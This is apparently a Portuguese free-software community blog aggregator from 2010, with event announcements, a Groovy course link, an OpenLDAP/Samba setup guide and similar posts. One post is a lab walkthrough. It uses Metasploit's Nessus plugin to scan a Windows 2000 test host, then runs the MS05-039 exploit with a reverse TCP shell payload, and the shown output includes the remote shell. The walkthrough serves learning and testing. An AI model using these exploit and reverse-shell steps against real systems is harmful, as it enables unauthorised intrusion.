Ir para o conteúdo
ou

Software livre Brasil

Tela cheia Sugerir um artigo
 Feed RSS

Blogosfera do PSL-Ba

16 de Junho de 2009, 0:00 , por Software Livre Brasil - | 2 pessoas seguindo este artigo.

O Projeto Software Livre Bahia (PSL-BA) é um movimento aberto que busca, através da força cooperativa, disseminar na esfera estadual os ideais de liberdade difundidos pela Fundação Software Livre (FSF), possibilitando assim a democratização do acesso a informação, através dos recursos oferecidos pelo Software Livre. Esta busca tem seus alicerces fundados na colaboração de todos, formando um movimento sinérgico que converge na efetivação dos ideais de Liberdade, Igualdade, Cooperação e Fraternidade.

O Projeto Software Live Bahia é formado pela articulação de indivíduos que atuam em instituições publicas e privadas, empresas, governos ou ONGs, e demais setores da sociedade. Além disso o projeto não é subordinado a qualquer entidade ou grupo social, e não estabelece nenhuma hierarquia formal na sua estrutura interna.


Rafael Gomes: Primeira lista de palestras aprovadas para o IV ENSL / IV EPSL

30 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

A comissão organizadora do IV ENSL /IV EPSL, evento que ocorrerá em Natal/RN nos dias 05 e 06 de Novembro, informa que foi publicada nesta quarta-feira, 29 de Setembro, a 1ª lista de palestras aprovadas pelo comitê de avaliação, formado por diversos membros da comunidade de software livre.

Informamos também que já está disponível a página dos palestrantes convidados, com maiores informações a respeito daqueles que já confirmaram presença em nosso evento.

Não perca esta oportunidade, faça já sua inscrição, venha discutir software livre e reencontrar amigos no calor do Nordeste



JavaBahia: Mini-curso Groovy & Grails

29 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários aindaExcelentes os slides deste mini-curso de Victor Hugo Germano! Dá uma navegada para vc ter uma idéia do que Groovy e Grails podem fazer....




Mônica Paz: Sobre Mobilização para o Mozilla Drumbeat no Arte.Mov

29 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Segue trechos de uma mensagem encaminhada (via Wille) do Diego Casaes solicitando mobilização para o Mozilla Drumbeat no Arte.Mov neste sábado, dia 02.

-----------------------

Queria falar com vocês sobre um evento/projeto que estamos idealizando para o sábado no Festival Vivo Arte.Mov: o Mozilla Drumbeat. Aqui na empresa onde trabalho em São Paulo, a Esfera, somos os coordenadores do Drumbeat no Brasil, e envolve a criação de eventos e captação de projetos da sociedade que promovam uma web aberta.

Explicando um pouco mais, o Mozilla Drumbeat (http://drumbeat.org/) é uma comunidade internacional de pessoas que compartilham um objetivo em comum: promover a web aberta e mantê-la livre. Para isso, a Mozilla quer reunir advogados, professores, hackers, artistas, cineastas, e outras pessoas que usam a Internet em seu cotidiano para fazerem coisas que tornam a web melhor, e que ajudem a mantê-la aberta por um longo tempo. Queremos começar um movimento. Queremos manter a web aberta pelos próximos 100 anos.
No último sábado (25/09), houve um evento Drumbeat em Belém, no Pará: o Drumbeat Amazônia. Já houve também eventos em São Paulo, Florianópolis, São Carlos, e algumas atividades do Drumbeat no FISL. Além dos eventos, o foco do Drumbeat está nos projetos que promovam a web aberta. Aqui tem mais informações sobre os projetos.
Há, no entanto, um porém: pra viabilizar esse evento agora de Salvador precisamos mobilizar uma rede de blogueiros, desenvolvedores, pessoas com projetos de cultura digital e web, enfim, divulgar o evento para que tenhamos engajamento das pessoas de Salvador e região! Eu viajo pra Salvador na sexta-feira, pois votarei aí, e me voluntariei com o pessoal do Arte.Mov pra facilitar as discussões do Drumbeat, mas preciso dum help de vocês.
(...)
Fico a disposição de dúvidas e comentários!
Abraços,
--
Diego Casaes
Content Manager at Esfera (Casa da Cultura Digital)
http://blog.esfera.mobi/
Author at Global Voices Online: 
http://globalvoicesonline.org/author/diego-casaes/
Translation Editor at Global Voices in Portuguese:
http://pt.globalvoicesonline.org/author/diegocasaes/
Gtalk: diegocasaes | Skype: diegocasaes
Follow me on Twitter: @casaesdiego
For updates in Portuguese, follow @diegocasaes


Alexandro Silva: Brincando com o plugin do Nessus para o Metasploit

28 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.

Para os testes utilizei o seguinte cenário:

* Host Debian com Nessus e Metasploit
* Host Alvo com Windows 2000 “bugado até a alma”

Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão

cd /tmp/pentest_tools/trunk

svn update

/opt/nessus/sbin/nessus-update-plugins

/opt/nessus/sbin/nessus-service &

./msconsole

| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ — –=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10505 updated today (2010.09.28)

msf>

Diversão :)

Carregando o Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Conectando…

msf> nessus_connect localhost:8834 ok

[+] Username:
alexos
[+] Password:
***********
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated

Listando as políticas existentes no Nessus

msf> nessus_policy_list

[+] Nessus Policy List

ID Name Owner visability
– —- —– ———-
1 attack alexos private

Iniciando a varredura

msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6

[*] Creating scan from policy number 1, called “alexoscorelabs” and scanning 192.168.0.6
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Finalizada a verredura é hora de checar o relatório

msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3
—- ——– ——– ———— —– —– —– —–
0 icmp 1 general 0 2 0 0
0 tcp 3 general 0 9 0 1
0 udp 1 general 0 1 0 0
21 tcp 3 ftp 1 4 2 2
135 tcp 3 epmap 1 1 0 1
135 udp 3 epmap? 0 0 0 1
137 udp 1 netbios-ns 0 1 0 0
139 tcp 1 smb 1 1 0 0
445 tcp 3 cifs 1 10 2 12
1025 tcp 3 dce-rpc 1 1 0 1
1028 udp 1 dce-rpc 0 1 0 0
5800 tcp 1 www 1 4 0 0
5801 tcp 1 www 1 3 0 0
5900 tcp 3 vnc 1 2 0 1
5901 tcp 1 vnc 1 3 0 0

Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo

msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
—- ——– ——– ———– —– ——– — ———– ———–
cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .
cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
cifs (445/tcp) 1 11011 SMB Service Detection none . . None .
cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .
cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .
cifs (445/tcp) 1 17651 Obtains the password policy none . . None .
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .
cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .
cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .
cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution

msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the SMB service…
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] …
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] …
[*] Calling the vulnerable function…
[*] Sending stage (240 bytes) to 192.168.0.6
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

C:\WINNT\system32> ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2

Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.

Google Bookmarks Twitter Technorati Favorites Google Gmail LinkedIn Google Reader WordPress Slashdot Reddit Delicious Multiply Digg Identi.ca Share



Serge Rehem: Época de Pensamentos 2.0 - Redes Sociais Corporativas, Estruturas Flexíveis e Adaptabilidade

27 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Neste momento estou em guarajuba, mais precisamente na entrada de Monte Gordo. São 11:35 de domingo, 26/09/2010. Deixei o carro num Lava Jato, pois esta semana começa o CBSoft. Vem colegas de outros estados, provavelmente darei carona a alguns e o auto está uma vergonha de sujo. Enquanto espero, parei no boteco mais próximo e pedi uma cerveja gelada. Premeditadamente, vim equipado com Notebook, MP4 Player (tocando nesse post de Vinicius Teles, e nos registros das sessões do grupo Dojo-Bahia. Esse lance de jogo funciona mesmo...

Finalizando esta parte, os 3 artigos em sequencia na Época (e nem cheguei na matéria da Capa...) somados às leituras, conversas e palestras decorrentes do LinguÁgil só me ajudaram a reafirmar convicções e pensamentos anteriores. Precisamos buscar estruturas organizacionais mais flexiveis, valorizar o ludico, as conexões entre pessoas, pensar e agir diferente, buscar o novo. Inspecionar, adaptar.

Agora vou pedir a conta e pagar a 2a cerveja (parece o problema do Buteco, que usamos no último coding-dojo heheh) e ir buscar o carro. Ainda tenho que levar almoço pra galera de casa. Na pré-história o homem saia para caçar e buscar comida, enquanto a mulher cuidava da casa e das crias. Hoje foi só um pouquinho diferente, saí para lavar o carro e buscar comida (no restaurate a Kilo). Escrevi 3 posts (na hora H resolvi juntar tudo num só), ouvi várias vezes as música do Maglore. Nada mal. Ah, o carro tá lindo, cheiroso e limpo.



Mônica Paz: arte.mov - Festival Internacional de Arte em Mídias Móveis em Salvador

26 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda
  • When:from September 29, 2010 to October 2, 2010
  • URL:http://www.artemov.net/
  • Address:Museu de Arte Moderna da Bahia (MAM), no Solar do Unhão. Av. Contorno. Salvador.

Divulgação: Cartaz do evento Arte.Mov Salvador, MAM-BA.

Arte_mov2010



Rafael Gomes: OpenLDAP + Samba como alternativa livre ao Active Directory

23 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Há muito tempo tenho interesse de instalar e configurar um ambiente alternativo ao Active Directory da Microsoft, mas nunca tive tempo para tal pesquisa e configuração.

No meu novo emprego, por coincidência ou não, foi solicitado a instalação desse ambiente. Sendo assim estou satisfeito em proporcionar esse resultado.

Vale salientar que algumas funções do Active Directory ainda não foram completamente atendidas, tal como o controle de estações via GPO e afins, mas iremos tratar isso posteriormente.

Eu instalei esse ambiente em um CentOS 5.5 x64 (Final), mas acredito que ele possa ser reproduzido em qualquer distribuição Gnu/Linux.


Segue abaixo os pacotes utilizados e suas versões:

Pacote Versão Link
OpenLDAP 2.3 http://www.openldap.org/
Samba 3.4.6 http://www.samba.org
Httpd 2.2 http://httpd.apache.org/
OpenSSL 0.9.8 http://www.openssl.org/
MySQL 5.0.77 http://www.mysql.com/
PHP 5.1.6 Http://www.php.net
CentOS 5.5 http://www.centos.org/

Eu utilizei o repositório EPEL, que é mantido pela comunidade para obter alguns pacotes extras, esse é um repositório sério, pode confiar:

# rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/x86_64/epel-release-5-4.noarch.rpm

Agora vamos instalar os pacotes necessários:

# yum install openldap-servers nss_ldap samba httpd openssl mod_ssl mysql mysql-server php php-xml php-ldap php-mysql php-pdo php-cli php-common smbldap-tools

A efeito de entendimento, quando for citado o termo <NOMEDOMINIO>, ele deve ser substituído para nome preterido pelo seu domínio,  <NOMEHOST> pelo nome do servidor a ser instalado e <SEUIP> pelo ip do servirdor.

OpenLDAP

Agora vamos começar pelas configurações do OpenLDAP:

Acesse o arquivo /etc/hosts e adicione a seguinte linha:

<SEUIP> <NOMEHOST>.<NOMEDOMINIO> <NOMEHOST>

Execute o comando abaixo para que seu nome seja modificado:

# hostname <NOMEHOST>

Agora vamos ao OpenLDAP,

Execute o comando abaixo para gerar o hash da senha a ser utilizada no arquivo de configuração do OpenLDAP:

# slappasswd

Guarde o arquivo padrão do OpenLDAP com o comando abaixo:

# mv -f /etc/openldap/slapd.conf /etc/openldap/slapd.conf.dist

Acesse o arquivo /etc/openldap/slapd.conf e adicione o seguinte conteúdo:

include /etc/openldap/schema/core.schema
include /etc/openldap/schema/cosine.schema
include /etc/openldap/schema/inetorgperson.schema
include /etc/openldap/schema/nis.schema
include /etc/openldap/schema/samba.schema
allow bind_v2
pidfile /var/run/openldap/slapd.pid
argsfile /var/run/openldap/slapd.args
database bdb
suffix “dc=<NOMEDOMINIO>,dc=com,dc=br”
rootdn “cn=root,dc=<NOMEDOMINIO>”
rootpw Coloque aqui o hash gerado com o comando slappasswd
password-hash {SSHA}
directory /var/lib/ldap
index cn,sn,uid,displayName pres,sub,eq
index uidNumber,gidNumber eq
index sambaSID eq
index sambaPrimaryGroupSID eq
index sambaDomainName eq
index objectClass pres,eq
index default sub
access to attrs=userPassword,sambaLMPassword,sambaNTPassword
by self write
by anonymous auth
by * none
access to *
by * read

Digite os comandos abaixo para que os arquivos necessário sejam copiados e devidamente ajustados:

# cp /usr/share/doc/samba-3.*/LDAP/samba.schema /etc/openldap/schema/
# cp /etc/openldap/DB_CONFIG.example /var/lib/ldap/DB_CONFIG
# chown ldap:ldap /var/lib/ldap/DB_CONFIG
# chmod 600 /var/lib/ldap/DB_CONFIG

Crie o arquivo /etc/openldap/init.ldif, que será utilizado para adicionar as informações básicas de sua base openldap com o seguinte conteúdo:

dn: dc=<NOMEDOMINIO>,dc=com,dc=br
objectclass: dcObject
objectclass: organization
o: CentOS Directory Server
dc: <NOMEDOMINIO>

dn: cn=root,dc=<NOMEDOMINIO>,dc=com,dc=br
objectclass: organizationalRole
cn: root

Agora execute os comandos abaixo para que o arquivo seja carregado corretamente:

# slapadd -l /etc/openldap/init.ldif
# chown -R ldap:ldap /var/lib/ldap
# chmod 600 /var/lib/ldap/*

Com o comando abaixo, você poderá verificar se o procedimento foi efetuado de maneira correta:

# slapcat

Com os comandos abaixo iremos ativar o serviço OpenLDAP:

# service ldap start
# chkconfig ldap on

Com o comando abaixo será possível verificar se todo processo foi efetuado com sucesso:

# ldapsearch -x -b "dc=<NOMEDOMINIO>,dc=com,dc=br"

PHPLDAPAdmin

Pronto, seu OpenLDAP está ok! Agora vamos ao PHPLDAPAdmin.

Execute o comando abaixo para instalar o phpldapadmin:

# yum install phpldapadmin -y

Acesse o arquivo /usr/share/phpldapadmin/config/config.php e adicione as seguintes linhas:

$ldapservers->SetValue($i,’server’,'name’,'CentOS Openldap’);
$ldapservers->SetValue($i,’server’,'host’,'<SEUIP>’);
$ldapservers->SetValue($i,’server’,'base’,array(‘dc=<NOMEDOMINIO>,dc=com,dc=br’));
$ldapservers->SetValue($i,’server’,'auth_type’,'session’);

Obs: Atente que é necessário configurar o acesso ao phpldapadmin via HTTPS. Caso contrário ele não funcionará. Não irei abordar aqui essa configuração.

Agora acesse a URL abaixo:

https://<SEUIP>/phpldapadmin

Obs: Acesse com um usuário criado, ensinaremos posteriormente nesse manual como criar usuários.

Samba

Agora vamos a configuração do Samba.

Primeiramente, vamos guardar os arquivos que são instalados por padrão e obter uma base para nossa configuração com os comandos abaixo:

# mv /etc/samba/smb.conf /etc/samba/smb.conf.dist
# cp /usr/share/doc/smbldap-tools*/smb.conf /etc/samba/smb.conf

Acesse o arquivo /etc/samba/smb.conf e edite conforme seu ambiente.

Como nessa arquitetura, o servidor OpenLDAP e Samba estarão no mesmo servidor, sendo assim segue abaixo três parâmetros que devem ser adicionados no arquivo /etc/samba/smb.conf:

ldap ssl = off
nt acl support = yes
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192 SO_KEEPALIVE

Com o comando abaixo vamos obter uma base para configuração do smbldap-tools:

# cp /usr/share/doc/smbldap-tools-*/smbldap.conf /etc/smbldap-tools/smbldap.conf

Com o comando abaixo vamos gerar o SID do seu domínio:

# net getlocalsid

Obs: Retornará diversos erros. Não se preocupe, espere até o final de todo retorno, que terá a informação necessária.

Acesse o arquivo /etc/smbldap-tools/smbldap.conf, adicione o SID retirado no comando anterior, e modifique os parâmetros de acordo com seu ambiente.

Acesse o arquivo /etc/smbldap-tools/smbldap_bind.conf e configure também de acordo com seu ambiente.

Com os comandos abaixo ajuste a permissão dos arquivos de configuração do smbldap-tools:

# chmod 644 /etc/smbldap-tools/smbldap.conf
# chmod 600 /etc/smbldap-tools/smbldap_bind.conf

Digite o comando abaixo e selecione a opção “Local authorization is sufficient” :

# authconfig-tui

Utilize o comando abaixo para verificar se todos os parâmetros do samba estão devidamente configurados:

# testparm

Com os comandos abaixo inicie a população da base LDAP:

# smbpasswd -w < SUA SENHA DE ROOT DO LDAP AQUI >
# smbldap-populate

Inicie o serviço e configure para iniciar no boot automaticamente com os comandos abaixo:

# /etc/init.d/smb start
# chkconfig smb on

Para adicionar um novo usuário é necessário adicionar no unix, samba e LDAP, com os comandos abaixo:

# useradd user1
# smbldap-useradd -a -G 'Domain Users' -m -s /bin/bash -d /home/user2 -F "" -P user1

Com comando abaixo veja quais as relações no LDAP com os GID locais do unix:

# net groupmap list

Agora crie os grupos locais com as relações informadas no comando acima:

# groupadd -g 514 samba_domain_guests
# groupadd -g 515 samba_domain_computers
# groupadd -g 544 samba_administrator
# groupadd -g 548 samba_account_operators
# groupadd -g 550 samba_print_operators
# groupadd -g 551 samba_backup_operators
# groupadd -g 552 samba_replicators

Para criar um novo grupo digite o comando abaixo:

# smbldap-groupadd -a "grupo1"

Agora verifique qual GID está configurado para ele na base LDAP com o comando abaixo:

# net groupmap list

Com o comando abaixo crie o arquivo na base unix com o GID igual ao obtido no comando anterior:

# groupadd -g < GID DO GRUPO AQUI> grupo1

Com os comandos abaixo vamos desabilitar todos os serviços desnecessários do servidor:

# chkconfig ntpd off
# chkconfig bluetooth off
# chkconfig xinetd off
# chkconfig smartd off
# chkconfig yum-updatesd off
# chkconfig rpcidmapd off
# chkconfig rpcgssd off
# chkconfig restorecond off
# chkconfig portmap off
# chkconfig pcscd off
# chkconfig nfslock off
# chkconfig mcstrans off
# chkconfig mdmonitor off
# chkconfig irqbalance off
# chkconfig kudzu off
# chkconfig ip6tables off
# chkconfig hidd off
# chkconfig gpm off
# chkconfig haldaemon off
# chkconfig autofs off
# chkconfig avahi-daemon off
# service ntpd stop
# service bluetooth stop
# service xinetd stop
# service smartd stop
# service yum-updatesd stop
# service rpcidmapd stop
# service rpcgssd stop
# service restorecond stop
# service portmap stop
# service pcscd stop
# service nfslock stop
# service mcstrans stop
# service mdmonitor stop
# service irqbalance stop
# service kudzu stop
# service ip6tables stop
# service hidd stop
# service gpm stop
# service haldaemon stop
# service autofs stop
# service avahi-daemon stop

Com o comando abaixo configure o servidor para buscar parâmetros de usuário e grupo na base ldap:

# authconfig --enableldap --enableldapauth --ldapserver 127.0.0.1 --ldapbasedn dc=<NOMEDOMINIO>,dc=com,dc=br --kickstart

Obs: Não se esqueça de configurar em seu DNS o nome do domínio para o ip do servidor que acabou de configurar.

Pronto! Seu ambiente está completamente pronto!

Clientes com Windows 7

Você tem máquina Windows 7 em sua rede? Não ta conseguindo adicionar ela em seu domínio?

Não se desespere! Siga os passos abaixo:

Primeiro vamos instalar uma versão mais atual do Samba, pois a versão disponível no repositório do CentOS é a 3.0 e o Windows 7 somente foi suportado a partir da versão 3.3.

Vamos configurar o repositório de onde iremos atualizar o nosso samba:

# cd /etc/yum.repos.d/
# wget http://ftp.sernet.de/pub/samba/3.3/centos/5/sernet-samba.repo

Agora atualize seus pacotes, o samba será atualizado:

# yum update

Obs : Caso não queria mais utilizar esse repositório, basta remover o arquivo /etc/yum.repos.d/sernet-samba.repo.

Recoloque o samba na inicialização automática do sistema e reinicialize o serviços com os comandos abaixo:

# chkconfig --add smb
# chkconfig smb on
# service smb restart

Antes de adicionar a máquina no domínio, é necessário executar um .reg na mesma, pois existem algumas opções que precisam ser modificadas para que ele se adeque ao domínio samba.

Pronto, com esse procedimento será possível adicionar uma estação Windows7 em seu domínio.



Pontão JuntaDados: IV Encontro Nordestino de Software Livre &amp; IV Encontro Potiguar de Software Livre (IV ENSL)

23 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

O IV Encontro Nordestino de Software Livre & IV Encontro Potiguar de Software Livre (IV ENSL) é um evento que ocorrerá em Natal-RN, a cidade do sol, nos dias 5 e 6 de novembro de 2010, no Praiamar Hotel & Convention. O evento é organizado pelo Projeto Software Livre RN (PSL-RN) em parceria com o SEBRAE-RN e tem, assim como o PSL-RN, o objetivo principal de promover o uso e desenvolvimento de Softwares Livres como uma alternativa de liberdade de expressão, econômica e tecnológica. Dessa forma, o PSL-RN recebe, com muito orgulho, o evento regional e pretende realizar o maior encontro sobre cultura livre realizado no Nordeste.

No IV ENSL serão apresentadas palestras técnicas, painéis e casos de sucesso em empresas, instituições de ensino e órgãos públicos com o uso e desenvolvimento de Software Livre. Esse ano, em especial, dentro do IV ENSL também ocorrerão o VII Fórum GNOME e o III Fórum KDE Brasil – Edição Nordeste, ambos eventos de âmbito nacional. O público estimado para esta edição do evento é composto por profissionais e entusiastas da Tecnologia da Informação e Comunicação (TIC), professores e estudantes, reunindo representantes das esferas empresarial, governamental, acadêmica e da sociedade civil.

leia mais



Mônica Paz: Questionário sobre Software Livre - pesquisa acadêmica

23 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Participe desta pesquisa para uma tese de doutorado em Ciências Sociais da Universidade Federal da Bahia - UFBA, que visa entender o significado social do Software Livre.

Creio que a pesquisa também seja uma forma de colaborar com a comunidade, uma vez que trará mais dados sobre "quem somos".


Possivelmente, os dados coletados também serão utilizados por mim em minha pesquisa em cibercultura/FACOM/UFBA.

Por favor, acessem o formulário Questionário sobre Software Livre.

Fiquem a vontade para encaminhar e ajudar na divulgação!



LinguÁgil 2010

21 de Setembro de 2010, 1:03, por Software Livre Brasil - 0sem comentários ainda

Banner-horizontal-linguagil

Nos dias 16, 17 e 18 de setembro, aconteceu a segunda edição do LinguÁgil. Este ano, o evento foi realizado pelos grupos de usuários Java Bahia, PHP Bahia, Rails Bahia, Agile Bahia, Python Bahia, a Unijorge e a Colivre (cooperativa da qual sou sócia) com o apoio e patrocínio ouro e prata de algumas empresas.

Infelizmente, não pude participar dos cursos neste ano (ano passado participei de 2 :D), mas participei do Dojo Noosfero no dia 17 e assisti as palestras do dia 18.

Nunca tinha participado de um Dojo, mas como era com o Noosfero, apareci lá :D
Para saber um pouco sobre Dojo, tem um post de Danilo Sato que explica como funciona.

Quando começou achei estranha a ideia de ir para a frente de todo mundo e programar com todos os outros olhando e comentando. Programo em par e já programei em trio, mas não com a tela do computador projetada num telão.
Logo no início, fizeram uma lista com os nomes das pessoas que queriam participar como piloto e co-piloto. Não coloquei meu nome, preferi ser só plateia...

Depois que todos da lista já tinham participado, Serge, organizador e membro do Java Bahia, me convidou para participar e acabei aceitando. Faltava pouco para o desafio ser resolvido, então ainda pude contribuir com o código (terceiro aplicou o patch no repositório do Noosfero no dia 20/09).

Não foi estranho como eu achei que seria, na verdade, até gostei :)

As palestras foram muito boas e, em breve, serão disponibilizadas para todos assistirem.
Após as palestras, teve o "Boteco Linguágil" com @alegomes: os palestrantes do dia ficaram na mesa enquanto @alegomes passeava na sala conduzindo a discussão e incentivando a plateia a contribuir com a discussão e interagir com os palestrantes.

O evento foi muito bom e tenho certeza que o próximo será ainda melhor.

Provavelmente estarei lá de novo :D



Vicente Aguiar: Dimensões e características da Web brasileira

17 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Você sabe (ou não?) que o primeiro princípio da Web, proposto pelo W3C Brasil, afirma que “o principal valor da Web é o social. Mais do que tecnológico, este é um ambiente de comunicação humana, de transações comerciais, de oportunidades para compartilhar conhecimentos e, para ser um ambiente universal, deve estar disponível para todas as pessoas, independentemente dos equipamentos e softwares que utilizem, principalmente da cultura em que inserem, da localização geográfica, das habilidades físicas ou mentais, das condições socioeconômicas ou de instrução”.

"Medir e acompanhar a evolução da Web brasileira é uma das mais recentes atividades do CGI.br conduzida pelo escritório do W3C no Brasil e pelo Centro de Estudos e Pesquisas em Tecnologia de Redes e Operações (CEPTRO.br), a fim de se produzirem informações e indicadores que contribuam para o en-
tendimento das características da Web e do seu comportamento nas áreas de acessibilidade e universalidade, além de acompanhar a sua própria evolução."

Por isso, o censo realizado sobre a WEB no Brasil, intitulado "Dimensões e características da Web brasileira: um estudo do .gov.br", tem o objetivo aumentar o conhecimento e o entendimento da Internet brasileira a partir da coleta e análise detalhada de dados dos sítios hospedados sob o domínio .br .

Por meio dessa pesquisa,  é possível saber, por exemplo, quanto sítios há na Web.br, qual o tamanho da Web.br e como se dá seu crescimento, que tipos de tecnologias são utilizadas, se os sítios são acessíveis ou não. Vale então a leitura. ;-)



Pontão JuntaDados: Nova revisão da distribuição GNU/Linux juntaDados 2.04r1

16 de Setembro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Novidades
